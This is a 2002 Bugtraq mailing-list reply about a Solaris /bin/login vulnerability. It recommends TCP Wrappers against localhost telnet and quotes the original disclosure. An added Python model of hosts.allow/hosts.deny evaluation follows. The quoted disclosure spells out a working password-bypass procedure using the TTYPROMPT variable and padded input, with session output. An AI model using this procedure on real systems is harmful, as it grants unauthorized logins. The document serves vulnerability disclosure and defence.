[27286] in bugtraq


Re: Solaris 2.6, 7, 8

daemon@ATHENA.MIT.EDU (Ramon Kagan)
Thu Oct 3 21:48:25 2002

Date: Wed, 2 Oct 2002 13:26:59 -0400 (EDT)
From: Ramon Kagan <rkagan@YorkU.CA>
To: Jonathan S <js@APOLLO.GTI.NET>
In-Reply-To: <Pine.BSO.4.44.0210021207060.25321-100000@eurocompton.net>
Message-ID: <Pine.LNX.4.44.0210021326330.7706-100000@centaur.ccs.yorku.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Another thing, if you tcpwrap your telnet sessions, you can prevent
localhost telnets.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
rkagan@yorku.ca

-------------------------------------
I have not failed.  I have just
found 10,000 ways that don't work.
	- Thomas Edison
-------------------------------------

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6-character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: jons@ccpartnersltd.com
>
>
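
The TCP Wrappers restriction suggested in the reply above, as an added example that is not part of the original thread: a simplified Python model of hosts_access(5) evaluation, showing when a loopback deny for in.telnetd actually takes effect. The rule files, addresses and function names are constructed for illustration, and telnet is assumed to be started from inetd through tcpd.

```python
# Simplified model of hosts_access(5): hosts.allow is checked first, then
# hosts.deny, and access is granted when neither file matches.
# Assumptions: IPv4 only; patterns handled are ALL, exact host or address,
# address prefixes such as "127." and name suffixes such as ".example.org".
# net/mask, LOCAL, EXCEPT, netgroups and line continuations are not modelled.

# Constructed sample rule files (not taken from any real host).
DENY_LOOPBACK = "# hosts.deny\nin.telnetd: 127. localhost\n"
ALLOW_ADMIN_NET = "# hosts.allow\nin.telnetd: 192.0.2.\n"
ALLOW_TOO_BROAD = "# hosts.allow\nin.telnetd: ALL\n"

def parse_rules(text):
    """Return [(daemon_list, client_list)] from hosts.allow/hosts.deny text."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        fields = line.split(":")
        daemons = fields[0].replace(",", " ").split()
        clients = fields[1].replace(",", " ").split()
        rules.append((daemons, clients))
    return rules

def pattern_matches(pattern, addr, name):
    if pattern == "ALL":
        return True
    if pattern.endswith("."):            # address prefix, e.g. "127."
        return addr.startswith(pattern)
    if pattern.startswith("."):          # host name suffix
        return name.lower().endswith(pattern.lower())
    return pattern.lower() in (addr, name.lower())

def any_rule_matches(rules, daemon, addr, name):
    for daemons, clients in rules:
        daemon_ok = any(d in ("ALL", daemon) for d in daemons)
        if daemon_ok and any(pattern_matches(c, addr, name) for c in clients):
            return True
    return False

def access_granted(allow_text, deny_text, daemon, addr, name=""):
    """True if tcpd would accept the connection under this simplified model."""
    if any_rule_matches(parse_rules(allow_text), daemon, addr, name):
        return True                      # an allow match ends evaluation
    if any_rule_matches(parse_rules(deny_text), daemon, addr, name):
        return False
    return True                          # default when nothing matches
```

Because hosts.allow is consulted first, a broad allow entry cancels the loopback deny, so both files need reviewing together. The loopback deny also leaves clients on other addresses unrestricted, so it does not replace the patch from Sun mentioned in the quoted report.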

